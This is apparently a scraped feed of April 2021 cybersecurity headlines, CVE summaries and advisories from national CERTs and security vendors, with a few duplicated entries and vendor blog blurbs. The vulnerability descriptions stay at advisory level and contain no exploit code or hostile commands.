https://www.qnap.com/en/how-to/knowledge-base/article/how-to-access-qnap-nas-by-ssh [3] https://qnap.to/3daz2n 

https://dyn.cncs.gov.pt/pt/detalhe/art/135538/o-cncs-aconselha-todas-as-entidades-que-atualizem-os-dispositivos-qnap
Comemoração do 10º aniversário do Girls in ICT
2021-04-22T00:00:00Z | 1619049600

De forma a adaptar as tradicionais comemorações do Girls in ICT ao contexto em que vivemos, este ano o CNCS comemora o aniversário desta efeméride com o lançamento de seis entrevistas sob o mote “You can´t be what you can´t see. / Não podemos ser aquilo que não vemos”. Desta forma, cada entrevistada terá uma palavra e uma epigrafe que dará o tom e o tema das perguntas.A primeira entrevista será lançada hoje e as restantes serão divulgadas diariamente (dias úteis), até dia 29 de abril.Recorde-se que o Girls in ICT é um evento internacional que tem como meta principal inspirar futuras gerações a colmatar a crítica disparidade de género no sector. Assim, diminuir esta disparidade passa, necessariamente, pela consciencialização e informação das mulheres sobre as oportunidades do sector educativo e profissional das TIC. Este trabalho de sensibilização e consciência, para ser eficaz, deverá estar amplamente articulado através das várias comunidades que constituem o sector.

https://dyn.cncs.gov.pt/pt/detalhe/art/135537/comemoracao-do-10-aniversario-do-girls-in-ict
CVE-2021-22682
2021-04-22T00:00:00Z | 1619049600

IMPROPER ACCESS CONTROL CWE-284 The affected product is configured by default to be installed for all users, which allows full permissions, including read/write access. This may allow unprivileged users to modify the binaries and configuration files and lead to local privilege escalation.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22682
CVE-2021-22678
2021-04-22T00:00:00Z | 1619049600

IMPROPER INPUT VALIDATION CWE-20 The affected application lacks proper validation of user-supplied data when parsing project files. This could lead to memory corruption. An attacker could leverage this vulnerability to execute code in the context of the current process.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22678
New article: Run your malicious VBA macros anywhere!
2021-04-21T08:11:00Z | 1618992660

Kurt Natvig explains how he recompiled malicious VBA macro code to valid harmless Python 3.x code. Read more

https://www.virusbulletin.com/blog/2021/04/new-article-run-your-malicious-vba-macros-anywhere/
High Threat Security Alert (A21-04-05): Vulnerability in Pulse Secure Products
2021-04-21T04:00:00Z | 1618977600

Pulse Secure has released a security advisory about a zero-day vulnerability in Pulse Connect Secure appliances.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-04-06): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2021)
2021-04-21T04:00:00Z | 1618977600

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-04-07): Multiple Vulnerabilities in SonicWall Products
2021-04-21T04:00:00Z | 1618977600

SonicWall has released a security advisory about the zero-day vulnerabilities in Email Security products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-04-08): Multiple Vulnerabilities in Google Chrome
2021-04-21T04:00:00Z | 1618977600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Prusa Research PrusaSlicer Obj.cpp load_obj() out-of-bounds write vulnerability
2021-04-21T00:00:00Z | 1618963200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1219
Prusa Research PrusaSlicer Objparser::objparse() stack-based buffer overflow vulnerability
2021-04-21T00:00:00Z | 1618963200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1220
Prusa Research PrusaSlicer Admesh stl_fix_normal_directions() out-of-bounds write vulnerability
2021-04-21T00:00:00Z | 1618963200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1222
SonicWall Email Security post-authentication arbitrary file read vulnerability
2021-04-20T11:12:49Z | 1618917169

SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to read an arbitrary file on the remote host. CVE: CVE-2021-20023 Last updated: April 20, 2021, 11:12 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0010
New Gartner Report: 2021 Strategic Roadmap for SASE Convergence
2021-04-20T06:04:25Z | 1618898665

Digitalization, work-from-anywhere, and cloud computing have accelerated SASE offerings to address the need for secure and optimized access, anytime, anywhere, and on any device. In Gartner’s new report from March 25, Neil MacDonald, Nat Smith, Lawrence Orans, and Joe Skorupa provide invaluable insights with a clear message to enterprises: “SASE is a pragmatic and compelling model that... The post New Gartner Report: 2021 Strategic Roadmap for SASE Convergence appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-gartner-report-2021-strategic-roadmap-for-sase-convergence/
Security Alert (A21-04-04): Multiple vulnerabilities in Firefox
2021-04-20T04:00:00Z | 1618891200

Mozilla has published the advisories (MFSA 2021-15 and MFSA 2021-16) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-23281
2021-04-20T00:00:00Z | 1618876800

CODE INJECTION CWE-94 Eaton Intelligent Power Manager (IPM) prior to 1.69 is vulnerable to an unauthenticated remote code execution vulnerability. IPM software does not sanitize the date provided via the "coverterCheckList" function in meta_driver_srv.js class. Attackers can send a specially crafted packet to make IPM connect to rouge SNMP server and execute attacker-controlled code.

https://claroty.com/team82/disclosure-dashboard/cve-2021-23281
CVE-2021-23280
2021-04-20T00:00:00Z | 1618876800

UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE CWE-434 Eaton Intelligent Power Manager (IPM) prior to 1.69 is vulnerable to an authenticated arbitrary file upload vulnerability. IPM's maps_srv.js allows an attacker to upload a malicious NodeJS file using the "uploadBackground" function. An attacker can upload a malicious code or execute any command using a specially crafted packet to exploit the vulnerability.

https://claroty.com/team82/disclosure-dashboard/cve-2021-23280
CVE-2021-23279
2021-04-20T00:00:00Z | 1618876800

IMPROPER INPUT VALIDATION CWE-20 Eaton Intelligent Power Manager (IPM) prior to 1.69 is vulnerable to an unauthenticated arbitrary file delete vulnerability induced due to improper input validation in meta_driver_srv.js class with the "saveDriverData" function using invalidated driverID. An attacker can send specially crafted packets to delete the files on the system where IPM software is installed.

https://claroty.com/team82/disclosure-dashboard/cve-2021-23279
CVE-2021-23278
2021-04-20T00:00:00Z | 1618876800

IMPROPER INPUT VALIDATION CWE-20 Eaton Intelligent Power Manager (IPM) prior to 1.69 is vulnerable to an authenticated arbitrary file delete vulnerability induced due to improper input validation at server/maps_srv.js with the "removeBackground" function and server/node_upgrade_srv.js with the "removeFirmware" function. An attacker can send specially crafted packets to delete the files on the system where IPM software is installed.

https://claroty.com/team82/disclosure-dashboard/cve-2021-23278
CVE-2021-23277
2021-04-20T00:00:00Z | 1618876800

EVAL INJECTION CWE-95 Eaton Intelligent Power Manager (IPM) prior to 1.69 is vulnerable to an unauthenticated eval injection vulnerability. The software does not neutralize code syntax from users before using in the dynamic evaluation call in the "loadUserFile" function under scripts/libs/utils.js. Successful exploitation can allow attackers to control the input to the function and execute attacker-controlled commands.

https://claroty.com/team82/disclosure-dashboard/cve-2021-23277
CVE-2021-23276
2021-04-20T00:00:00Z | 1618876800

SQL INJECTION CWE-89 Eaton Intelligent Power Manager (IPM) prior to 1.69 is vulnerable to authenticated SQL injection. A malicious user can send a specially crafted packet to exploit this vulnerability. Successful exploitation of this vulnerability can allow attackers to add users in the data base.

https://claroty.com/team82/disclosure-dashboard/cve-2021-23276
What is a UTM Firewall and What Is Beyond It?
2021-04-19T18:08:12Z | 1618855692

In theory, Universal Threat Management (UTM) platforms should have long ago promoted efficiency: collapsing many security features into a single appliance. In reality, though, UTMs often became headaches in the making, putting IT on a vicious and costly lifecycle of appliance upgrades.  How can you take the UTM’s benefits and avoid the scalability problem? Let’s take a look to find out what’s beyond the UTM and the future of network security.  Firewalls Evolve... The post What is a UTM Firewall and What Is Beyond It? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-a-utm-firewall-and-what-is-beyond-it/
The Business Case for WAN Transformation with Cato Cloud
2021-04-19T10:34:46Z | 1618828486

The post The Business Case for WAN Transformation with Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-business-case-for-wan-transformation-with-cato-cloud/
Akamai Recognized as 2021 Gartner Peer Insights Customers' Choice for Web Application Firewalls
2021-04-19T04:00:00Z | 1618804800

Akamai has been named a Gartner Peer Insights Customers' Choice for Web Application Firewalls (for the second time).

https://www.akamai.com/blog/news/akamai-recognized-as-2021-gartner-peer-insights-customers-choice
Synology DSM synoagentregisterd server finder out-of-bounds write vulnerability
2021-04-19T00:00:00Z | 1618790400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1159
Synology QuickConnect servers HTTP redirection Information Disclosure Vulnerability
2021-04-19T00:00:00Z | 1618790400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1160
Building an A/B Test with EdgeWorkers and EdgeKV
2021-04-17T04:00:00Z | 1618632000

When paired with our new EdgeKV distributed key-value database, the Akamai EdgeWorkers serverless platform gives you the ability to do powerful things at the CDN level.

https://www.akamai.com/blog/developers/building-an-a-b-test-with-edgeworkers-and-edgekv
Rahvusvaheline küberkaitseõppus keskendub riigi infosüsteemide kaitsele pandeemiast mõjutatud maailmas
2021-04-15T09:44:51Z | 1618479891

Tallinnas asuv NATO Küberkaitsekoostöö Keskus (CCDCOE) korraldab koos mitmete partneritega sel nädalal maailmas ainulaadset rahvusvahelist küberkaitseõppust Locked Shields. Õppusel osalevad eksperdid harjutavad riigi julgeoleku seisukohast oluliste küber-füüsiliste süsteemide kaitset ja kriisiolukorra kogu juhtimissüsteemi ulatuslike küberrünnete korral. Esmakordselt õppuse ajaloos suunab ka valdav osa korraldusmeeskonnast õppuse käiku distantsilt eri riikidest üle maailma.

https://ria.ee/uudised/rahvusvaheline-kuberkaitseoppus-keskendub-riigi-infosusteemide-kaitsele-pandeemiast
Cosori Smart 5.8-Quart Air Fryer CS158-AF configuration server code execution vulnerability
2021-04-15T00:00:00Z | 1618444800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1217
Cosori Smart 5.8-Quart Air Fryer CS158-AF configuration server code execution vulnerability
2021-04-15T00:00:00Z | 1618444800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1216
CVE-2021-27500
2021-04-15T00:00:00Z | 1618444800

REACHABLE ASSERTION CWE-617 A specifically crafted packet sent by an attacker may result in a denial-of-service condition. Read more: Fuzzing and PR'ing: How We Found Bugs in a Popular Third-Party EtherNet/IP Protocol Stack

https://claroty.com/team82/disclosure-dashboard/cve-2021-27500
CVE-2021-27498
2021-04-15T00:00:00Z | 1618444800

REACHABLE ASSERTION CWE-617 A specifically crafted packet sent by an attacker may result in a denial-of-service condition. Read more: Fuzzing and PR'ing: How We Found Bugs in a Popular Third-Party EtherNet/IP Protocol Stack

https://claroty.com/team82/disclosure-dashboard/cve-2021-27498
CVE-2021-27482
2021-04-15T00:00:00Z | 1618444800

OUT-OF-BOUNDS READ CWE-125 A specifically crafted packet sent by an attacker may allow the attacker to read arbitrary data. Read more: Fuzzing and PR'ing: How We Found Bugs in a Popular Third-Party EtherNet/IP Protocol Stack

https://claroty.com/team82/disclosure-dashboard/cve-2021-27482
CVE-2021-27478
2021-04-15T00:00:00Z | 1618444800

INCORRECT CONVERSION BETWEEN NUMERIC TYPES CWE-681 A specifically crafted packet sent by an attacker to the affected devices may cause a denial-of-service condition. Read more: Fuzzing and PR'ing: How We Found Bugs in a Popular Third-Party EtherNet/IP Protocol Stack

https://claroty.com/team82/disclosure-dashboard/cve-2021-27478
High Threat Security Alert (A21-04-02): Multiple Vulnerabilities in Microsoft Products
2021-04-14T04:00:00Z | 1618372800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-04-03): Multiple Vulnerabilities in Google Chrome
2021-04-14T04:00:00Z | 1618372800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Adapting Security to Work Anywhere
2021-04-14T04:00:00Z | 1618372800

"Working from home 2021" was the title of my talk at The Cyber Security Summit in January, and the strikethrough is important.

https://www.akamai.com/blog/security/adapting-security-to-work-anywhere
CNCS aconselha entidades à substituição dos certificados TLS/SSL Camerfirma
2021-04-14T00:00:00Z | 1618358400

O CNCS, no âmbito dos seus serviços de prevenção, aconselha a todas as entidades a substituição dos certificados TLS/SSL, onde a Camerfirma se encontre na cadeia de certificação da Certificate Authority (CA), uma vez que estes vão deixar de ser considerados seguros pelas novas versões Google Chrome 90 e Mozilla Firefox 88. Para verificar se o seu website utiliza esta CA no certificado TLS/SSL, pode utilizar o seguinte link, de forma a confirmar se o campo "Issuer" menciona a Camerfirma. Para resolver esta situação, deve contactar a entidade onde adquiriu o certificado TLS/SSL, sendo que receberá as instruções para a renovação/alteração.

https://dyn.cncs.gov.pt/pt/detalhe/art/135536/cncs-aconselha-entidades-a-substituicao-dos-certificados-tlsssl-camerfirma
What is SASE and what is not SASE
2021-04-13T12:33:40Z | 1618317220

The post What is SASE and what is not SASE appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-55
RIA küberruumi analüüs: jätkuvad rünnakukatsed riigiasutuste vastu
2021-04-13T10:46:23Z | 1618310783

Riigi Infosüsteemi Ameti (RIA) hinnangul mõjutasid I kvartalis küberruumi turvalisust Microsofti meiliserveri tarkvara haavatavused, katsed ligi pääseda riigiasutuste serveritele ning teenustõkkerünnakud ja nendega seotud väljapressimised.

https://ria.ee/uudised/ria-kuberruumi-analuus-jatkuvad-runnakukatsed-riigiasutuste-vastu
Taking Action This Earth Month
2021-04-13T04:00:00Z | 1618286400

There's a fascinating human phenomenon often studied in the behavioral science field called the intention-action gap.

https://www.akamai.com/blog/culture/taking-action-this-earth-month
Microsoft Azure Sphere mount namespace unsigned code execution vulnerability
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1247
OpenClinic GA web portal multiple SQL injection vulnerabilities in 'listImmoLabels.jsp' page
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1208
OpenClinic GA web portal multiple SQL injection vulnerabilities in the 'getAssets.jsp' page
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1207
OpenClinic GA web portal SQL injection vulnerability in 'statistics/quickFile.jsp' page
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1202
OpenClinic GA unauthenticated command injection vulnerability
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1203
Microsoft Azure Sphere Linux namespace ptrace unsigned code execution vulnerability
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1249
OpenClinic GA installation privilege escalation vulnerability
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1204
Microsoft Azure Sphere mqueue inode initialization kernel code execution vulnerability
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1250
OpenClinic GA Web portal SQL injection vulnerability in 'manageServiceStocks.jsp' page
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1206
Microsoft Azure Sphere Kernel pwm_ioctl_apply_state kfree() code execution vulnerability
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1262
OpenClinic GA web portal multiple SQL injection vulnerabilities in 'patientslist.do' page
2021-04-13T00:00:00Z | 1618272000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1205
CVE-2020-25244
2021-04-13T00:00:00Z | 1618272000

UNCONTROLLED SEARCH PATH ELEMENT CWE-427 The software insecurely loads libraries that may allow an attacker to use DLL hijacking and takeover the system where the software is installed.

https://claroty.com/team82/disclosure-dashboard/cve-2020-25244
CVE-2020-25243
2021-04-13T00:00:00Z | 1618272000

IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL') CWE-22 A vulnerability could be triggered while importing a compromised project file to the affected software, which may allow the execution of commands on the system.

https://claroty.com/team82/disclosure-dashboard/cve-2020-25243
The Gartner 2021 Strategic Roadmap for SASE Convergence
2021-04-12T08:57:51Z | 1618217871

The post The Gartner 2021 Strategic Roadmap for SASE Convergence appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-gartner-2021-strategic-roadmap-for-sase-convergence/
Gambling, Streaming Traffic Up During Men's College Basketball Tourney
2021-04-12T04:00:00Z | 1618200000

Gambling industry-related web traffic delivered by Akamai jumped 31% over the category average for all of Q4 2020 on March 31st.

https://www.akamai.com/blog/performance/gambling-streaming-traffic-up-during-mens-college-basketball
Projeto de decreto-lei regulamenta o Regime Jurídico da Segurança do Ciberespaço e define as obrigações em matéria de certificação da cibersegurança
2021-04-12T00:00:00Z | 1618185600

Para este efeito estabelece que o CNCS é a Autoridade Nacional de Certificação da Cibersegurança e prevê o regime sancionatório pela violação das disposições do Regulamento, permitindo a implementação de um quadro nacional de certificação da cibersegurança.Com este desígnio prevê os requisitos de segurança das redes e dos sistemas de informação (que são aplicáveis à Administração Pública, aos operadores de infraestruturas críticas e aos operadores de serviços essenciais) e define ainda os requisitos de notificação de incidentes (que são aplicáveis à Administração Pública, aos operadores de infraestruturas críticas, aos operadores de serviços essenciais e aos prestadores de serviços digitais).Recorde-se estas regras não se aplicam às empresas que oferecem redes de comunicações públicas ou serviços de comunicações eletrónicas acessíveis ao público, ficando assim sujeitas ao regime específico constante da Lei das Comunicações Eletrónicas.Desta forma, as entidades abrangidas por este decreto-lei assumem um conjunto de obrigações destinadas a promover um maior nível de segurança das redes e dos sistemas de informação. Estamos a falar da inclusão da realização de um inventário de ativos e a designação de um ponto de contato permanente com o Centro Nacional de Cibersegurança (CNCS), de forma a assegurar a troca de informação na eventualidade de um incidente de cibersegurança. Devem também designar um responsável de segurança para gerir as medidas adotadas em matéria de requisitos de segurança e de notificação de incidentes, bem como notificar o CNCS de qualquer incidente de segurança que ocorra nas suas redes informáticas.O envio de comentários e documentos, no âmbito da presente consulta pública, faz-se exclusivamente pelo portal ConsultaLEX e pressupõe a inscrição na plataforma dos cidadãos, empresas ou associações que queiram exercer o seu direito de participação. Para saber mais informações aceda aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135535/projeto-de-decreto-lei-regulamenta-o-regime-juridico-da-seguranca-do-ciberespaco-e-define-as-obrigacoes-em-materia-de-certificacao-da-ciberseguranca
SonicWall GMS 9.3 unauthenticated remote command execution vulnerability
2021-04-10T01:08:27Z | 1618016907

A command execution vulnerability in SonicWall GMS 9.3 allows a remote unauthenticated attacker to locally escalate privilege to root. CVE: CVE-2021-20020 Last updated: April 10, 2021, 1:08 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0009
SonicWall Email Security post-authentication arbitrary file creation vulnerability
2021-04-09T22:03:27Z | 1618005807

SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to upload an arbitrary file to the remote host. CVE: CVE-2021-20022 Last updated: April 9, 2021, 10:03 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0008
SonicWall Email Security pre-authentication administrative account creation vulnerability
2021-04-09T17:12:09Z | 1617988329

A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host. CVE: CVE-2021-20021 Last updated: April 9, 2021, 5:12 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007
Security Alert (A21-04-01): Multiple Vulnerabilities in Cisco Products
2021-04-09T04:00:00Z | 1617940800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Caught on Camera: Rethinking IoT Security
2021-04-09T04:00:00Z | 1617940800

We all know that we're on camera pretty much constantly -- most coffee shops, convenience stores, and even offices employ security cameras for protection. But what happens when those devices built to keep us safe become unsafe?

https://www.akamai.com/blog/security/caught-on-camera-rethinking-iot-security
Akamai Titans 2020: Celebrating Outstanding Achievements
2021-04-09T04:00:00Z | 1617940800

To Akamai's Co-Founder Danny Lewin, calling someone a "Titan" was the highest praise he would give. Danny himself was a remarkably talented and hard-working leader whose heart, passion, and spirit still inspire us.

https://www.akamai.com/blog/culture/akamai-titans-2020-celebrating-outstanding-achievements
CVE-2019-18243
2021-04-09T00:00:00Z | 1617926400

INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE CWE-732 The affected product allows a local authenticated user to modify system-wide iFIX configurations through the registry. This may allow privilege escalation.

https://claroty.com/team82/disclosure-dashboard/cve-2019-18243
Emerging Edge Computing Use Cases
2021-04-08T04:00:00Z | 1617854400

The first rule of edge compute thought leadership is: don't overuse the term edge. Over the course of my blog series on the topic, I have defined the edge, explained edge computing, and discussed the economics of edge computing.

https://www.akamai.com/blog/edge/emerging-edge-computing-use-cases
Dream Report platform privilege escalation vulnerability
2021-04-08T00:00:00Z | 1617840000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1146
Rukovoditel Project Management App application SQL injection vulnerability in the 'global_lists/choices' page
2021-04-08T00:00:00Z | 1617840000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1201
Rukovoditel Project Management App application SQL injection vulnerability in the 'access_rules/rules_form' page
2021-04-08T00:00:00Z | 1617840000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1200
Rukovoditel Project Management App multiple SQL injection vulnerabilities in the 'entities/fields' page
2021-04-08T00:00:00Z | 1617840000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1199
Rukovoditel Project Management App SQL injection vulnerability in the 'forms_fields_rules/rules' page
2021-04-08T00:00:00Z | 1617840000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1198
RIA küberturvalisuse aastaraamat võtab kokku mõjukamad juhtumid küberruumis
2021-04-07T03:53:48Z | 1617767628

Riigi infosüsteemi amet (RIA) kirjutab värskes küberturvalisuse aastaraamatus möödunud aasta rekordarv õngitsustest, ummistusrünnakutest, Emotet pahavarast ja ministeeriumeid tabanud küberrünnakutest. Intsidentide kõrval saab lugeda COVID-19 mõjust Eesti küberruumile, RIA suuremast rollist valimistel ning tutvuda uue Eesti infoturbestandardiga ja olulisemate arengutega rahvusvahelises küberkoostöös. Aastaraamatuga saab tutvuda RIA kodulehel.

https://ria.ee/uudised/ria-kuberturvalisuse-aastaraamat-votab-kokku-mojukamad-juhtumid-kuberruumis
Flexible taxonomies and new software for the tag2domain project
2021-04-06T13:59:18Z | 1617717558

Domain Names are the center piece of locating services on the internet and they can be used for a variety of purposes and services. Understanding the type of services a Domain Name offers is one of the key aspects of Internet Security. In another post last year we already introduced tag2domain, our tagging / labelling framework for domain names that helps us to better understand this landscape of services and software. In this article we want to highlight a recently released, major update to the tag2domain repository. In this update we improve on the basic concepts of tag2domain, introduce software components that manage tag creation and updating, and add scripts and documentation that help in setting up a tag2domain database. This work is part of nic.at’s project within the Connecting Europe Facilities (CEF) framework as project 2018-AT-IA-0111. tag2domain – Basics Before we get into the new developments, let us briefly reiterate the basic concepts of tag2domain. tag2domain is a framework for labelling DNS domain names with tags that is inspired by similar tagging systems such as the MISP system, the RSIT taxonomy, and OpenStreetMap tags. Think of these tags as sticky notes that attach to a domain and represent some kind of interesting property. These tags are grouped into taxonomies and each tag has a name and may also have a value. A single tag then looks like this: (cert-example-domain.at) -> taxonomy:tag = value As an example consider a taxonomy “proper_names” with tags that could look like: (city-of-vienna.at) -> proper_names:place_name = city The tags themselves are things like “place_name”, “first_name”, “organization_name” and so on. Under the tag “place_name” there are values named “city”, “village”, or “river”. A single domain can be associated with multiple tags. For example the name “Steyr” is the name of a city and the name of a river making both tags appropriate for a domain name that contains “steyr”. Since some properties of a domain name can change over time (e.g. is there a website hosted under this domain?), each tag has a start and an end date so one can calculate statistics over these tags at different points in time. Also, as some properties cannot be measured continuously, we include a “measured_at” property that gets updated each time a tag is confirmed. The overall setup of a tag2domain tagging system looks like this: We measure domain properties and pack them into measurements. These measurements get handed off to a service that updates the tag2domain database. On the other side we want to retrieve the gathered data via a REST interface. All these components are now included in the tag2domain repository. tag2domain – New features To make tag2domain tags a little more flexible we added two features to the basic framework: We now allow the tag and value set of a taxonomy to grow as new tags and values are observed. This enables us to define taxonomies where tags and values are not known in advance. We added categories that group tags together within a taxonomy. This is done on the semantic layer by adding a prefix “category_name::” to the tag name and is used to calculate fine-grained statistics using the tag2domain-api programming interface. An example where both of these features come in handy is when one wants to tag software used under a given domain name, like so: (city-of-vienna.at) -> software:web-server::apache = v2.4.232 With the new capabilities of tag2domain the set of version numbers can grow as new versions are rolled out and the “web-server” category can be used to calculate statistics such as the market share of different web servers. In addition to updating the tag2domain framework, we also added py_tag2domain, a programming library that takes measurements as an input and converts them into tags stored in a tag2domain database. Measurements are simple JSON objects such as this one: { "version": "1",  "tag_type": "domain",  "tagged_id": 3,  "taxonomy": "names",  "producer": "namefinder",  "measured_at": "2020-12-23T10:30:51",  "measurement_id": " namefinder/1",  "tags": [  { "tag": "place_name", "value": "city" } ]} py_tag2domain has been integrated into tag2domain-api so that measurements can be delivered by a REST call. Also, we built a service called msm2tag2domain that fetches measurements from a Kafka topic and does the same thing. In addition to these new software components we overhauled the setup process of tag2domain, expanded the documentation, and created docker-based demo setups so you can easily try it out for yourself. If you have any feedback to this article or any comments regarding tag2domain you can reach us via tag2domain@cert.at. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/4/flexible-taxonomies-and-new-software-for-the-tag2domain-project
The Complete Checklist for True SASE Platforms
2021-04-06T13:53:58Z | 1617717238

The post The Complete Checklist for True SASE Platforms appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-complete-checklist-for-true-sase-platforms/
New Forrester Report: Merging Network and Security in the Age of Covid
2021-04-06T07:02:29Z | 1617692549

If you’re looking for more incisive perspective on the trend towards merging WAN and security in the cloud, check out Forrester’s January 21 report, Introducing the Zero Trust Model for Security and Network Services by analysts David Holmes and Andre Kindness. Even if you’ve already digested Gartner’s SASE reports (and our numerous blogs), this one... The post New Forrester Report: Merging Network and Security in the Age of Covid appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-forrester-report-merging-network-and-security-in-the-age-of-covid/
Tax Season: Criminals Play the Numbers Game Too
2021-04-06T04:00:00Z | 1617681600

Criminals love tax season. The stress and urgency surrounding this time of year makes the victim pool highly vulnerable to various types of schemes.

https://www.akamai.com/blog/security/tax-season-criminals-play-the-numbers-game-too
Industry 4.0 – Talking About a Revolution
2021-04-04T09:26:20Z | 1617528380

The fourth industrial revolution – aka Industry 4.0 – represents the next phase of innovation in production processes. Industry 4.0 merges traditional systems with new digital technologies (IoT, AI, big data, AR, robotics, M2M, real-time analytics, and so on), facilitating automation, agility, and efficiency to create a world of smart manufacturing. In an Industry 4.0... The post Industry 4.0 – Talking About a Revolution appeared first on Cato Networks.

https://www.catonetworks.com/blog/industry-4-0-talking-about-a-revolution/
Solar: Context-free, interactive analysis for Solidity
2021-04-02T04:52:39Z | 1617339159

We’re hiring for our Research + Engineering team!  By Aaron Yoo, University of California, Los Angeles As an intern at Trail of Bits, I worked on Solar, a proof-of-concept static analysis framework. Solar is unique because it enables context-free interactive analysis of Solidity smart contracts. A user can direct Solar to explore program paths (e.g., […]

https://blog.trailofbits.com/2021/04/02/solar-context-free-interactive-analysis-for-solidity/
Cato Offers a Free Certification Program to Help Customers and Channel Partners Learn the Fundamentals of SASE
2021-04-01T13:41:09Z | 1617284469

Earlier this week, Cato announced that the 600th graduate has completed the SASE Expert certification program. Business and technical professionals from around the world have sought out high-quality education to attain a baseline level of knowledge of this new approach to networking and security…and for good reason. Since SASE’s introduction, Gartner has cautioned about the... The post Cato Offers a Free Certification Program to Help Customers and Channel Partners Learn the Fundamentals of SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-offers-a-free-certification-program-to-help-customers-and-channel-partners-learn-the-fundamentals-of-sase/
Large number of porn scam messages being sent — do not believe scammers’ claims
2021-04-01T08:10:05Z | 1617264605

Scammers have actively sent out adult entertainment-themed extortion messages, also known as porn scams. The large number of scams sent in recent days has included messages translated into good Finnish. The messages are scams, and any demanded ransom should not be paid under any circumstances.

https://www.kyberturvallisuuskeskus.fi/en/news/large-number-porn-scam-messages-being-sent-do-not-believe-scammers-claims
Large number of porn scam messages being sent — do not believe scammers’ claims
2021-04-01T08:10:05Z | 1617264605

Scammers have actively sent out adult entertainment-themed extortion messages, also known as porn scams. The large number of scams sent in recent days has included messages translated into good Finnish. The messages are scams, and any demanded ransom should not be paid under any circumstances.

https://www.kyberturvallisuuskeskus.fi/en/news/large-number-porn-scam-messages-being-sent-do-not-believe-scammers-claims
February saw dreary cyber weather
2021-04-01T08:04:38Z | 1617264278

The NCSC-FI issued a red alert as a result of vulnerabilities identified in Microsoft Exchange servers. The vulnerabilities in question are serious and require action from organisations’ information security officers. The sun stayed hidden during the rest of February as well, with cyber skies marred by various scam and phishing campaigns and malware distributed via SMS and email.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-helmikuu-2021
February saw dreary cyber weather
2021-04-01T08:04:38Z | 1617264278

The NCSC-FI issued a red alert as a result of vulnerabilities identified in Microsoft Exchange servers. The vulnerabilities in question are serious and require action from organisations’ information security officers. The sun stayed hidden during the rest of February as well, with cyber skies marred by various scam and phishing campaigns and malware distributed via SMS and email.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-helmikuu-2021
NCSC-FI vulnerability coordination in a nutshell
2021-04-01T08:01:00Z | 1617264060

In this fourth part of our series of articles on vulnerabilities, we take a look at the National Cyber Security Centre Finland’s vulnerability coordination through example cases.

